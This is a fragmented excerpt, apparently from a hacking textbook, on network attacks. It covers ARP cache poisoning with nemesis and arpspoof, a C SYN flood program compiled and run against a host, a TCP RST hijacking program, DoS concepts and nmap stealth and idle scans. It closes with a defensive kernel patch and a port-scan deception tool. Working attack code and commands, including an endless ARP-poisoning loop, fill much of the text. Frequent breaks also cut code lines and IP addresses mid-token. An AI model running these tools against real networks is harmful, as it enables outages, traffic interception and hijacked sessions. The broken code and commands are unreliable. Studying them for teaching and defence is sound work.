This function uses the header lengths to split the packet up by layers and
the decoding functions to print out details of each layer's header
...
This allows accessing various fields of the
header, but it's important to remember these values will be in network byte
order
...

reader@hacking:~/booksrc $ gcc -o decode_sniff decode_sniff
...
/decode_sniff
Sniffing on device eth0
==== Got a 75 byte packet ====
[[ Layer 2 :: Ethernet Header ]]
[ Source: 00:01:29:15:65:b6 Dest: 00:01:6c:eb:1d:50 Type: 8 ]
(( Layer 3 ::: IP Header ))
( Source: 192
...
42
...
168
...
249 )
( Type: 6 ID: 7755 Length: 61 )
{{ Layer 4 :::: TCP Header }}
{ Src Port: 35602 Dest Port: 7890 }
{ Seq #: 2887045274 Ack #: 3843058889 }
{ Header Size: 32 Flags: PUSH ACK }
9 bytes of packet data
74 65 73 74 69 6e 67 0d 0a | testing
...
168
...
249 Dest: 192
...
42
...
168
...
1 Dest: 192
...
42
...

reader@hacking:~/booksrc $

With the headers decoded and separated into layers, the TCP/IP connection is
much easier to understand
...
Also, notice how the sequence number in the two packets from
192
...
42
...
This is used
by the TCP protocol to make sure all of the data arrives in order, since packets
could be delayed for various reasons
...
Protocols such as FTP, POP3, and

telnet transmit data without encryption
...
From
a security perspective, this isn't too good, so more intelligent switches provide
switched network environments
...
This requires more intelligent
hardware that can create and maintain a table associating MAC addresses with
certain ports, depending on which device is connected to each port, as illustrated
here
...
But even in a switched environment, there are clever ways to
sniff other devices' packets; they just tend to be a bit more complex
...

One important aspect of network communications that can be manipulated for
interesting effects is the source address
...
The act of forging a source address in a packet is known as spoofing
...

Figure 0x400-7
...
The other two
interesting details are found in ARP
...
Second,
no state information about the ARP traffic is kept, since this would require
additional memory and would complicate a protocol that is meant to be simple
...

These three details, when exploited properly, allow an attacker to sniff network
traffic on a switched network using a technique known as ARP redirection
...
This technique is called ARP
cache poisoning
...
Then
the attacker's machine simply needs to forward these packets to their appropriate
final destinations
...

Figure 0x400-8
...
The switch only filters traffic based on
MAC address, so the switch will work as it's designed to, sending A's and B's IP
traffic, destined for the attacker's MAC address, to the attacker's port
...

The switch works properly; it's the victim machines that are tricked into
redirecting their traffic through the attacker's machine
...
In order to maintain the
redirection attack, the attacker must keep the victim machine's ARP caches
poisoned
...

A gateway is a system that routes all the traffic from a local network out to the
Internet
...
For example, if a machine at
192
...
0
...
168
...
1 over a switch,
the traffic will be restricted by MAC address
...
In order to sniff this traffic, it
must be redirected
...
168
...
118 and 192
...
0
...
This can be done by pinging these hosts, since any IP
connection attempt will use ARP
...

reader@hacking:~/booksrc $ ping -c 1 -w 1 192
...
0
...
168
...
1 (192
...
0
...
168
...
1: icmp_seq=0 ttl=64 time=0
...
168
...
1 ping statistics --1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0
...
4/0
...
168
...
118
PING 192
...
0
...
168
...
118): 56 octets data
64 octets from 192
...
0
...
4 ms
--- 192
...
0
...
4/0
...
4 ms
reader@hacking:~/booksrc $ arp -na
? (192
...
0
...
168
...
118) at 00:C0:F0:79:3D:30 [ether] on eth0
reader@hacking:~/booksrc $ ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:00:AD:D1:C7:ED
inet addr:192
...
0
...
168
...
255 Mask:255
...
255
...
5 Kb) TX bytes:288567 (281
...
168
...
118 and 192
...
0
...
This way, packets can reach their final destinations
after being redirected to the attacker's machine
...
192
...
0
...
168
...
1
is at 00:00:AD:D1:C7:ED, and 192
...
0
...
168
...
118 is
also at 00:00:AD:D1:C7:ED
...
Nemesis was originally a suite
of tools written by Mark Grimes, but in the most recent version 1
...
The source code for Nemesis is on the LiveCD at
/usr/src/nemesis-1
...

reader@hacking:~/booksrc $ nemesis
NEMESIS -=- The NEMESIS Project Version 1
...

reader@hacking:~/booksrc $ nemesis arp help
ARP/RARP Packet Injection -=- The NEMESIS Project Version 1
...

reader@hacking:~/booksrc $ sudo nemesis arp -v -r -d eth0 -S 192
...
0
...
168
...
118 -h 00:00:AD:D1:C7:ED -m 00:C0:F0:79:3D:30 -H 00:00:AD:D1:C7:ED M 00:C0:F0:79:3D:30
ARP/RARP Packet Injection -=- The NEMESIS Project Version 1
...
168
...
1 > 192
...
0
...
168
...
118 -D
192
...
0
...
4 (Build 26)

[MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01
[Ethernet type] ARP (0x0806)
[Protocol addr:IP] 192
...
0
...
168
...
1
[Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01
[ARP opcode] Reply
[ARP hardware fmt] Ethernet (1)
[ARP proto format] IP (0x0800)
[ARP protocol len] 6
[ARP hardware len] 4
Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB
...
168
...
1 to 192
...
0
...
If these commands are repeated every 10 seconds, these
bogus ARP replies will continue to keep the ARP caches poisoned and the traffic
redirected
...
A simple BASH shell while loop is used below to
loop forever, sending our two poisoning ARP replies every 10 seconds
...
168
...
1 -D 192
...
0
...
168
...
118 -D 192
...
0
...
"
> sleep 10
> done
ARP/RARP Packet Injection -=- The NEMESIS Project Version 1
...
168
...
1 > 192
...
0
...

ARP Packet Injected
ARP/RARP Packet Injection -=- The NEMESIS Project Version 1
...
168
...
118 > 192
...
0
...

ARP Packet Injected
Redirecting
...
Nemesis uses a C library
called libnet to craft spoofed packets and inject them
...
libnet also provides several convenient functions for
dealing with network packets, such as checksum generation
...
It's well documented and the functions have descriptive names
...
The source file nemesis-arp
...
The nemesis_arp() function shown below is called in
nemesis
...

From nemesis-arp
...

void nemesis_arp(int argc, char **argv)
{
const char *module= "ARP/RARP Packet Injection";
nemesis_maketitle(title, module, version);
if (argc > 1 && !strncmp(argv[1], "help", 4))
arp_usage(argv[0]);
arp_initdata();
arp_cmdline(argc, argv);
arp_validatedata();
arp_verbose();

if (got_payload)
{
if (builddatafromfile(ARPBUFFSIZE, &pd, (const char *)file,
(const u_int32_t)PAYLOADMODE) < 0)
arp_exit(1);
}
if (buildarp(ðerhdr, &arphdr, &pd, device, reply) < 0)
{

printf("\n%s Injection Failure\n", (rarp == 0 ? "ARP" : "RARP"));
arp_exit(1);
}
else
{
printf("\n%s Packet Injected\n", (rarp == 0 ? "ARP" : "RARP"));
arp_exit(0);
}

}

The structures ETHERhdr and ARPhdr are defined in the file nemesis
...
In C, typedef is used to alias
a data type with a symbol
...
h
typedef struct libnet_arp_hdr ARPhdr;
typedef struct libnet_as_lsa_hdr ASLSAhdr;
typedef struct libnet_auth_hdr AUTHhdr;
typedef struct libnet_dbd_hdr DBDhdr;
typedef struct libnet_dns_hdr DNShdr;
typedef struct libnet_ethernet_hdr ETHERhdr;

typedef struct libnet_icmp_hdr ICMPhdr;
typedef struct libnet_igmp_hdr IGMPhdr;
typedef struct libnet_ip_hdr IPhdr;

The nemesis_arp() function calls a series of other functions from this file:
arp_initdata(), arp_cmdline(), arp_validatedata(), and arp_verbose()
...
The
arp_initdata() function does exactly this, initializing values in statically declared
data structures
...

From nemesis-arp
...
ether_type = ETHERTYPE_ARP; /* Ethernet type ARP */
memset(etherhdr
...
ether_dhost, 0xff, 6); /* Ethernet destination address */
arphdr
...
ar_hrd = ARPHRD_ETHER; /* hardware format: Ethernet */
arphdr
...
ar_hln = 6; /* 6 byte hardware addresses */
arphdr
...
ar_sha, 0, 6); /* ARP frame sender address */
memset(arphdr
...
ar_tha, 0, 6); /* ARP frame target address */
memset(arphdr
...
file_mem = NULL;
pd
...
Judging from the way the return value from
buildarp() is handled here, buildarp() builds the packet and injects it
...
c
...
c
int buildarp(ETHERhdr *eth, ARPhdr *arp, FileData *pd, char *device,
int reply)
{
int n = 0;
u_int32_t arp_packetlen;
static u_int8_t *pkt;
struct libnet_link_int *l2 = NULL;
/* validation tests */
if (pd->file_mem == NULL)
pd->file_s = 0;
arp_packetlen = LIBNET_ARP_H + LIBNET_ETH_H + pd->file_s;
#ifdef DEBUG
printf("DEBUG: ARP packet length %u
...
\n", pd->file_s);
#endif
if ((l2 = libnet_open_link_interface(device, errbuf) ) == NULL)
{
nemesis_device_failure(INJECTION_LINK, (const char *)device);
return -1;
}
if (libnet_init_packet(arp_packetlen, &pkt) == -1)
{
fprintf(stderr, "ERROR: Unable to allocate packet memory
...
Only "
"wrote %d bytes
...
\n", n,
nemesis_lookup_linktype(l2->linktype));
}
else
{
printf("Wrote %d byte %s packet through linktype %s
...
Using libnet functions, it
opens a link interface and initializes memory for a packet
...
Next, it writes the packet to the device to inject
it, and finally cleans up by destroying the packet and closing the interface
...

From the libnet Man Page
libnet_open_link_interface() opens a low-level packet interface
...
Supplied is a u_char pointer to the
interface device name and a u_char pointer to an error buffer
...

libnet_init_packet() initializes a packet for use
...
If the memory allocation is successful, the
memory is zeroed and the function returns 1
...
Since this function calls malloc, you certainly should,
at some point, make a corresponding call to destroy_packet()
...
Supplied is the

destination address, source address (as arrays of unsigned characterbytes)
and the ethernet frame type, a pointer to an optional data payload, the
payload length, and a pointer to a pre-allocated block of memory for the
packet
...

Supplied are the following: hardware address type, protocol address type, the
hardware address length, the protocol address length, the ARP packet type, the
sender hardware address, the sender protocol address, the target hardware
address, the target protocol address, the packet payload, the payload size,
and finally, a pointer to the packet header memory
...
The ARP packet type should be one of the following:
ARPOP_REQUEST, ARPOP_REPLY, ARPOP_REVREQUEST, ARPOP_REVREPLY,
ARPOP_INVREQUEST, or ARPOP_INVREPLY
...

libnet_close_link_interface() closes an opened low-level packet interface
...

With a basic understanding of C, API documentation, and common sense, you can
teach yourself just by examining open source projects
...

From the arpspoof Man Page
NAME
arpspoof - intercept packets on a switched LAN
SYNOPSIS
arpspoof [-i interface] [-t target] host
DESCRIPTION
arpspoof redirects packets from a target host (or all hosts) on the LAN
intended for another host on the LAN by forging ARP replies
...

Kernel IP forwarding (or a userland program which accomplishes the
same, e
...
fragrouter(8)) must be turned on ahead of time
...

-t target
Specify a particular host to ARP poison (if not specified, all
hosts on the LAN)
...

SEE ALSO
dsniff(8), fragrouter(8)
AUTHOR

Dug Song ...
The source code for this function should be readable to
you, since many of the previously explained libnet functions are used (shown in
bold below)
...

arpspoof
...

int
arp_send(struct libnet_link_int *llif, char *dev,
int op, u_char *sha, in_addr_t spa, u_char *tha, in_addr_t tpa)
{
char ebuf[128];
u_char pkt[60];
if (sha == NULL &&
(sha = (u_char *)libnet_get_hwaddr(llif, dev, ebuf)) == NULL) {
return (-1);
}
if (spa == 0) {
if ((spa = libnet_get_ipaddr(llif, dev, ebuf)) == 0)
return (-1);
spa = htonl(spa); /* XXX */
}
if (tha == NULL)
tha = "\xff\xff\xff\xff\xff\xff";
libnet_build_ethernet(tha, sha, ETHERTYPE_ARP, NULL, 0, pkt);
libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4,
op, sha, (u_char *)&spa, tha, (u_char *)&tpa,
NULL, 0, pkt + ETH_H);

fprintf(stderr, "%s ",
ether_ntoa((struct ether_addr *)sha));
if (op == ARPOP_REQUEST) {
fprintf(stderr, "%s 0806 42: arp who-has %s tell %s\n",
ether_ntoa((struct ether_addr *)tha),
libnet_host_lookup(tpa, 0),
libnet_host_lookup(spa, 0));
}
else {
fprintf(stderr, "%s 0806 42: arp reply %s is-at ",
ether_ntoa((struct ether_addr *)tha),
libnet_host_lookup(spa, 0));
fprintf(stderr, "%s\n",
ether_ntoa((struct ether_addr *)sha));
}
return (libnet_write_link_layer(llif, dev, pkt, sizeof(pkt)) == sizeof(pkt));
}

The remaining libnet functions get hardware addresses, get the IP address, and
look up hosts
...

From the libnet Man Page
libnet_get_hwaddr() takes a pointer to a link layer interface struct, a

pointer to the network device name, and an empty buffer to be used in case of
error
...

libnet_get_ipaddr() takes a pointer to a link layer interface struct, a

pointer to the network device name, and an empty buffer to be used in case of
error
...

libnet_host_lookup() converts the supplied network-ordered (big-endian) IPv4

address into its human-readable counterpart
...

Once you've learned how to read C code, existing programs can teach you a lot by
example
...
The goal here is to teach you how to learn from source code, as
opposed to just teaching how to use a few libraries
...

Denial of Service
One of the simplest forms of network attack is a Denial of Service (DoS) attack
...
There are two general forms of DoS attacks: those that crash
services and those that flood services
...
Often, these attacks are dependent on a
poor implementation by a specific vendor
...
If this program happens to be on a server, then no one
else can access that server after it has crashed
...
Since the operating
system handles the network stack, crashes in this code will take down the kernel,
denying service to the entire machine
...

SYN Flooding
A SYN flood tries to exhaust states in the TCP/IP stack
...
The
TCP/IP stack in the kernel handles this, but it has a finite table that can only track
so many incoming connections
...

The attacker floods the victim's system with many SYN packets, using a spoofed
nonexistent source address
...
Each of these
waiting, half-open connections goes into a backlog queue that has limited space
...
Instead, each half-open connection must time out, which takes a
relatively long time
...

Using the Nemesis and arpspoof source code as reference, you should be able to
write a program that performs this attack
...
The Nemesis source code uses the function libnet_get_prand() to
obtain pseudo-random numbers for various IP fields
...
These functions are
similarly used below
...
c
#include ...

/* Returns an IP in x
...
x
...

if (network == -1)
libnet_error(LIBNET_ERR_FATAL, "can't open network interface
...
\n");
libnet_init_packet(packet_size, &packet); // Allocate memory for packet
...
\n");
libnet_seed_prand(); // Seed the random number generator
...
\n", dest_port, print_ip(&dest_ip));
while(1) // loop forever (until break by CTRL-C)
{
libnet_build_ip(LIBNET_TCP_H, // Size of the packet sans IP header
...

if (byte_count < packet_size)
libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written
...

}
libnet_destroy_packet(&packet); // Free packet memory
...

libnet_error(LIBNET_ERR_WARNING, "can't close network interface
...

The value doesn't change—the typecasting just appeases the compiler
...
1, which is incompatible with libnet 1
...

However, Nemesis and arpspoof still rely on the 1
...
Similar to compiling with libpcap, when compiling with libnet, the flag lnet is used
...

reader@hacking:~/booksrc $ gcc -o synflood synflood
...
c:1:
/usr/include/libnet
...
c:6: error: syntax error before string constant
reader@hacking:~/booksrc $

The compiler still fails because several mandatory define flags need to be set for
libnet
...

reader@hacking:~/booksrc $ libnet-config --help
Usage: libnet-config [OPTIONS]
Options:
[--libs]
[--cflags]
[--defines]
reader@hacking:~/booksrc $ libnet-config --defines
-D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H
-DLIBNET_LIL_ENDIAN

Using the BASH shell's command substitution in both, these defines can be
dynamically inserted into the compile command
...
c -lnet
reader@hacking:~/booksrc $
...
/synflood
reader@hacking:~/booksrc $
reader@hacking:~/booksrc $
...
168
...
88 22
Fatal: can't open network interface
...

reader@hacking:~/booksrc $ sudo
...
168
...
88 22
SYN Flooding port 22 of 192
...
42
...

In the example above, the host 192
...
42
...
The tcpdump output below shows the
spoofed SYN packets flooding the host from apparently random IPs
...

reader@hacking:~/booksrc $ sudo tcpdump -i eth0 -nl -c 15 "host 192
...
42
...
334498 IP 121
...
150
...
4584 > 192
...
42
...
22: S
751659999:751659999(0) win 14609
17:08:16
...
78
...
110
...
168
...
88
...
358491 IP 53
...
19
...
36638 > 192
...
42
...
22: S
322318966:322318966(0) win 43747
17:08:16
...
109
...
11
...
168
...
88
...
382492 IP 52
...
214
...
45099 > 192
...
42
...
22: S
71363071:71363071(0) win 30490
17:08:16
...
112
...
34
...
168
...
88
...
406491 IP 60
...
221
...
21573 > 192
...
42
...
22: S
2144342837:2144342837(0) win 10594
17:08:16
...
101
...
0
...
168
...
88
...
430497 IP 188
...
248
...
8409 > 192
...
42
...
22: S
1825734966:1825734966(0) win 43454
17:08:16
...
71
...
65
...
168
...
88
...
454489 IP 218
...
249
...
27982 > 192
...
42
...
22: S
1767717206:1767717206(0) win 50156
17:08:16
...
238
...
7
...
168
...
88
...
478497 IP 130
...
104
...
48221 > 192
...
42
...
22: S
2069757602:2069757602(0) win 4767
17:08:16
...
187
...
68
...
168
...
88
...
502498 IP 33
...
101
...
44358 > 192
...
42
...
22: S
1524034954:1524034954(0) win 26970
15 packets captured
30 packets received by filter
0 packets dropped by kernel
reader@hacking:~/booksrc $ ssh -v 192
...
42
...
3p2, OpenSSL 0
...
8c 05 Sep 2006
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Connecting to 192
...
42
...
168
...
88] port 22
...
168
...
88 port 22: Connection refused
ssh: connect to host 192
...
42
...
The TCP stack using syncookies adjusts the
initial acknowledgment number for the responding SYN/ACK packet using a value
based on host details and time (to prevent replay attacks)
...
If the sequence number doesn't match or the ACK
never arrives, a connection is never created
...

The Ping of Death
According to the specification for ICMP, ICMP echo messages can only have 216,
or 65,536, bytes of data in the data part of the packet
...

Several operating systems crashed if they were sent ICMP echo messages that
exceeded the size specified
...
" It was a very simple hack
exploiting a vulnerability that existed because no one ever considered this
possibility
...
Modern
systems are all patched against this vulnerability
...
Even though oversized ICMP packets
won't crash computers anymore, new technologies sometimes suffer from similar
problems
...
Many implementations of Bluetooth suffer from the same
oversized ping packet problem
...

Teardrop
Another crashing DoS attack that came about for the same reason was called
teardrop
...
Usually, when a packet is
fragmented, the offsets stored in the header will line up to reconstruct the
original packet with no overlap
...

Although this specific attack doesn't work anymore, understanding the concept
can reveal problems in other areas
...
IP version 6 uses more complicated headers
and even a different IP address format than the IPv4 most people are familiar
with
...

Ping Flooding
Flooding DoS attacks don't try to necessarily crash a service or resource, but
instead try to overload it so it can't respond
...

The simplest form of flooding is just a ping flood
...
The attacker sends many
large ping packets to the victim, which eat away at the bandwidth of the victim's
network connection
...
An
attacker with greater bandwidth than a victim can send more data than the victim
can receive and therefore deny other legitimate traffic from getting to the victim
...
An amplification attack uses spoofing and
broadcast addressing to amplify a single stream of packets by a hundred-fold
...
This is a network that allows
communication to the broadcast address and has a relatively high number of
active hosts
...
The amplifier will broadcast these packets to all the hosts on
the amplification network, which will then send corresponding ICMP echo reply
packets to the spoofed source address (i
...
, to the victim's machine)
...
This attack can be done
with both ICMP packets and UDP echo packets
...

Figure 0x400-9
...
Since
bandwidth consumption is the goal of a flooding DoS attack, the more bandwidth
the attacker is able to work with, the more damage they can do
...
Systems installed with such software are commonly referred to as bots and
make up what is known as a botnet
...
The attacker uses some sort of a controlling
program, and all of the bots simultaneously attack the victim with some form of
flooding DoS attack
...

TCP/IP Hijacking
TCP/IP hijacking is a clever technique that uses spoofed packets to take over a
connection between a victim and a host machine
...

A one-time password can be used to authenticate once and only once, which
means that sniffing the authentication is useless for the attacker
...
By sniffing the local network segment, all of the details of open TCP
connections can be pulled from the headers
...
This sequence number is incremented
with each packet sent to ensure that packets are received in the correct order
...
Then the attacker sends a spoofed packet from the victim's IP address
to the host machine, using the sniffed sequence number to provide the proper
acknowledgment number, as shown here
...

The host machine will receive the spoofed packet with the correct
acknowledgment number and will have no reason to believe it didn't come from
the victim machine
...
If the source is spoofed and the acknowledgment number is
correct, the receiving side will believe that the source actually sent the reset
packet, and the connection will be reset
...
At a high level, it would
sniff using libpcap, then inject RST packets using libnet
...
Many other programs that use libpcap also don't need to look at every single
packet, so libpcap provides a way to tell the kernel to only send certain packets

that match a filter
...
For example, the filter rule to filter for a destination IP of
192
...
42
...
168
...
88"
...
The
tcpdump program uses BPFs to filter what it captures; it also provides a mode to
dump the filter program
...
168
...
88"
(000) ldh [12]
(001) jeq #0x800 jt 2 jf 4
(002) ld [30]
(003) jeq #0xc0a82a58 jt 8 jf 9
(004) jeq #0x806 jt 6 jf 5
(005) jeq #0x8035 jt 6 jf 9
(006) ld [38]
(007) jeq #0xc0a82a58 jt 8 jf 9
(008) ret #96
(009) ret #0
reader@hacking:~/booksrc $ sudo tcpdump -ddd "dst host 192
...
42
...

Filtering for established connections is a bit more complicated
...
The TCP
flags are found in the 13th octet of the TCP header
...
This
means that if the ACK flag is turned on, the 13th octet would be 00010000 in
binary, which is 16 in decimal
...

In order to create a filter that matches when the ACK flag is turned on without
caring about any of the other bits, the bitwise AND operator is used
...
This means that a filter of tcp[13] & 16 == 16 will match
the packets where the ACK flag is turned on, regardless of the state of the
remaining flags
...
This is easier to read but still provides the same
result
...

reader@hacking:~/booksrc $ sudo tcpdump -nl "tcp[tcpflags] & tcp-ack != 0 and dst host

192
...
42
...
567378 IP 192
...
42
...
40238 > 192
...
42
...
22:
...
770276 IP 192
...
42
...
40238 > 192
...
42
...
22:
...
770322 IP 192
...
42
...
40238 > 192
...
42
...
22: P 0:20(20) ack 22 win 92

10:19:47
...
168
...
72
...
168
...
88
...
918866 IP 192
...
42
...
40238 > 192
...
42
...
22: P 732:756(24) ack 766 win 115

A similar rule is used in the following program to filter the packets libpcap sniffs
...
This program will be explained as it's listed
...
c
#include ...
h>
#include "hacking
...
libnet_handle = libnet_open_raw_sock(IPPROTO_RAW);
if(critical_libnet_data
...
-- this program must
run
as root
...
packet));
if (critical_libnet_data
...
\n");
libnet_seed_prand();
set_packet_filter(pcap_handle, (struct in_addr *)&target_ip);
printf("Resetting all TCP connections to %s on %s\n", argv[1], device);
pcap_loop(pcap_handle, -1, caught_packet, (u_char *)&critical_libnet_data);
pcap_close(pcap_handle);
}

The majority of this program should make sense to you
...
libnet is used to open a raw socket interface and to allocate packet
memory
...
The final argument to the pcap_loop() call is user
pointer, which is passed directly to the callback function
...
Also, the snap length value used in
pcap_open_live() has been reduced from 4096 to 128, since the information
needed from the packet is just in the headers
...
The sprintf() function is just a
printf() that prints to a string
...

IPhdr = (struct libnet_ip_hdr *) (packet + LIBNET_ETH_H);
TCPhdr = (struct libnet_tcp_hdr *) (packet + LIBNET_ETH_H + LIBNET_TCP_H);
printf("resetting TCP connection from %s:%d ",
inet_ntoa(IPhdr->ip_src), htons(TCPhdr->th_sport));
printf("<---> %s:%d\n",
inet_ntoa(IPhdr->ip_dst), htons(TCPhdr->th_dport));
libnet_build_ip(LIBNET_TCP_H, // Size of the packet sans IP header
IPTOS_LOWDELAY, // IP tos
libnet_get_prand(LIBNET_PRu16), // IP ID (randomized)
0, // Frag stuff
libnet_get_prand(LIBNET_PR8), // TTL (randomized)
IPPROTO_TCP, // Transport protocol
*((u_long *)&(IPhdr->ip_dst)), // Source IP (pretend we are dst)
*((u_long *)&(IPhdr->ip_src)), // Destination IP (send back to src)
NULL, // Payload (none)
0, // Payload length
passed->packet); // Packet header memory
libnet_build_tcp(htons(TCPhdr->th_dport), // Source TCP port (pretend we are dst)
htons(TCPhdr->th_sport), // Destination TCP port (send back to src)
htonl(TCPhdr->th_ack), // Sequence number (use previous ack)
libnet_get_prand(LIBNET_PRu32), // Acknowledgement number (randomized)
TH_RST, // Control flags (RST flag set only)
libnet_get_prand(LIBNET_PRu16), // Window size (randomized)
0, // Urgent pointer
NULL, // Payload (none)
0, // Payload length
(passed->packet) + LIBNET_IP_H);// Packet header memory
if (libnet_do_checksum(passed->packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");
bcount = libnet_write_ip(passed->libnet_handle, passed->packet,
LIBNET_IP_H+LIBNET_TCP_H);
if (bcount < LIBNET_IP_H + LIBNET_TCP_H)
libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written
...
First, the critical libnet data is
retrieved, and pointers to the IP and TCP headers are set using the structures
included with libnet
...
h,
but the libnet structures are already there and compensate for the host's byte
ordering
...
The sniffed sequence number is used as the spoofed
packet's acknowledgment number, since that is what is expected
...
c -lnet

-lpcap
reader@hacking:~/booksrc $ sudo
...
168
...
88
DEBUG: filter string is 'tcp[tcpflags] & tcp-ack != 0 and dst host 192
...
42
...
168
...
88 on eth0
resetting TCP connection from 192
...
42
...
168
...
88:22

Continued Hijacking
The spoofed packet doesn't need to be an RST packet
...
The host machine receives the
spoofed packet, increments the sequence number, and responds to the victim's IP
...
And since the victim's machine ignored the host machine's
response packet, the victim's sequence number count is off
...
In this case, both legitimate
sides of the connection have incorrect sequence numbers, resulting in a
desynchronized state
...
This lets the
attacker continue communicating with the host machine while the victim's
connection hangs
...
Since most services run on standard, documented ports, this
information can be used to determine which services are running
...
While this is effective, it's also noisy and detectable
...

To avoid this, several clever techniques have been invented
...
This tool has become one of the most popular
open source port-scanning tools
...
This is because it doesn't
actually open a full TCP connection
...
A SYN scan doesn't complete the handshake, so a full connection
is never opened
...
If a SYN/ACK packet is received in response, that port must be
accepting connections
...

Using nmap, a SYN scan can be performed using the command-line option -sS
...

reader@hacking:~/booksrc $ sudo nmap -sS 192
...
42
...
20 ( http://insecure
...
168
...
72:
Not shown: 1696 closed ports
PORT STATE SERVICE
22/tcp open ssh
Nmap finished: 1 IP address (1 host up) scanned in 0
...
So yet another collection of techniques for stealth port scanning
evolved: FIN, X-mas, and Null scans
...
If a port is listening, these packets just
get ignored
...
This difference can be used to
detect which ports are accepting connections, without actually opening any
connections
...
While these types of scans
are stealthier, they can also be unreliable
...

Using nmap, FIN, X-mas, and NULL scans can be performed using the commandline options -sF, -sX, and -sN, respectively
...

Spoofing Decoys
Another way to avoid detection is to hide among several decoys
...
The responses from the spoofed connections aren't
needed, since they are simply misleads
...

Decoys can be specified in nmap with the -D command-line option
...
168
...
72, using 192
...
42
...
168
...
11 as decoys
...
168
...
10,192
...
42
...
168
...
72

Idle Scanning
Idle scanning is a way to scan a target using spoofed packets from an idle host, by
observing changes in the idle host
...
IP IDs are meant to be unique per packet per
session, and they are commonly incremented by a fixed amount
...
Newer operating systems, such as the recent
Linux kernel, OpenBSD, and Windows Vista, randomize the IP ID, but older
operating systems and hardware (such as printers) typically do not
...
By repeating this process a few more times, the increment applied to
the IP ID with each packet can be determined
...
One of two things will happen, depending on whether
that port on the victim machine is listening:
If that port is listening, a SYN/ACK packet will be sent back to the idle host
...

If that port isn't listening, the target machine doesn't send a SYN/ACK packet
back to the idle host, so the idle host doesn't respond
...
If it has only incremented by one interval, no other
packets were sent out by the idle host between the two checks
...
If the IP ID has incremented by two
intervals, one packet, presumably an RST packet, was sent out by the idle
machine between the checks
...

The steps are illustrated on the next page for both possible outcomes
...
If there is light
traffic on the idle host, multiple packets can be sent for each port
...
Even if there is light traffic, such as one or two
non–scan-related packets sent by the idle host, this difference is large enough that
it can still be detected
...

After finding a suitable idle host, this type of scanning can be done with nmap
using the -sI command-line option followed by the idle host's address:
reader@hacking:~/booksrc $ sudo nmap -sI idlehost
...
168
...
7

Figure 0x400-11
...
Knowing
what ports are open allows an attacker to determine which services can be
attacked
...
While writing this chapter, I wondered if it is
possible to prevent port scans before they actually happen
...

First of all, the FIN, Null, and X-mas scans can be prevented by a simple kernel
modification
...
The following output uses grep to find the kernel code responsible for
sending reset packets
...
*send_reset" /usr/src/linux/net/ipv4/
tcp_ipv4
...
th;
550- struct {
551- struct tcphdr th;
552-#ifdef CONFIG_TCP_MD5SIG
553- __be32 opt[(TCPOLEN_MD5SIG_ALIGNED >> 2)];
554-#endif
555- } rep;
556- struct ip_reply_arg arg;
557-#ifdef CONFIG_TCP_MD5SIG
558- struct tcp_md5sig_key *key;
559-#endif
560 return; // Modification: Never send RST, always return
...
*/

562- if (th->rst)
563- return;
564565- if (((struct rtable *)skb->dst)->rt_type != RTN_LOCAL)
566- return;
567-
reader@hacking:~/booksrc $

By adding the return command (shown above in bold), the tcp_v4_send_reset()
kernel function will simply return instead of doing anything
...

FIN Scan Before the Kernel Modification
matrix@euclid:~ $ sudo nmap -T5 -sF 192
...
42
...
11 ( http://www
...
org/nmap/ ) at 2007-03-17 16:58 PDT
Interesting ports on 192
...
42
...
462 seconds
matrix@euclid:~ $

FIN Scan After the Kernel Modification
matrix@euclid:~ $ sudo nmap -T5 -sF 192
...
42
...
11 ( http://www
...
org/nmap/ ) at 2007-03-17 16:58 PDT
Interesting ports on 192
...
42
...
462 seconds
matrix@euclid:~ $

This works fine for scans that rely on RST packets, but preventing information
leakage with SYN scans and full-connect scans is a bit more difficult
...
But if all of the closed ports also responded with SYN/ACK
packets, the amount of useful information an attacker could retrieve from port
scans would be minimized
...
Ideally, this should all be done
without using a TCP stack
...
It's a
modification of the rst_hijack
...
The callback function spoofs a
legitimate looking SYN/ACK response to any SYN packet that makes it through
the BPF
...

shroud
...
h>
#include ...
h"
#define MAX_EXISTING_PORTS 30
void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);
int set_packet_filter(pcap_t *, struct in_addr *, u_short *);
struct data_pass {
int libnet_handle;
u_char *packet;
};
int main(int argc, char *argv[]) {
struct pcap_pkthdr cap_header;
const u_char *packet, *pkt_data;
pcap_t *pcap_handle;
char errbuf[PCAP_ERRBUF_SIZE]; // Same size as LIBNET_ERRBUF_SIZE
char *device;
u_long target_ip;
int network, i;
struct data_pass critical_libnet_data;
u_short existing_ports[MAX_EXISTING_PORTS];
if((argc < 2) || (argc > MAX_EXISTING_PORTS+2)) {
if(argc > 2)
printf("Limited to tracking %d existing ports
...
]\n", argv[0]);
exit(0);
}
target_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE);
if (target_ip == -1)
fatal("Invalid target address");
for(i=2; i < argc; i++)
existing_ports[i-2] = (u_short) atoi(argv[i]);
existing_ports[argc-2] = 0;
device = pcap_lookupdev(errbuf);
if(device == NULL)
fatal(errbuf);
pcap_handle = pcap_open_live(device, 128, 1, 0, errbuf);
if(pcap_handle == NULL)
fatal(errbuf);
critical_libnet_data
...
libnet_handle == -1)
libnet_error(LIBNET_ERR_FATAL, "can't open network interface
...
\n");
libnet_init_packet(LIBNET_IP_H + LIBNET_TCP_H, &(critical_libnet_data
...
packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory
...
");
printf("bing!\n");
}

There are a few tricky parts in the code above, but you should be able to follow all
of it
...

reader@hacking:~/booksrc $ gcc $(libnet-config --defines) -o shroud shroud
...
/shroud 192
...
42
...
168
...
72 and tcp[tcpflags] & tcp-syn != 0 and
tcp[tcpflags] & tcp-ack = 0 and not (dst port 22 or dst port 80)'

While shroud is running, any port scanning attempts will show every port to be
open
...
168
...
189
Starting nmap V
...
00 ( www
...
org/nmap/ )
Interesting ports on (192
...
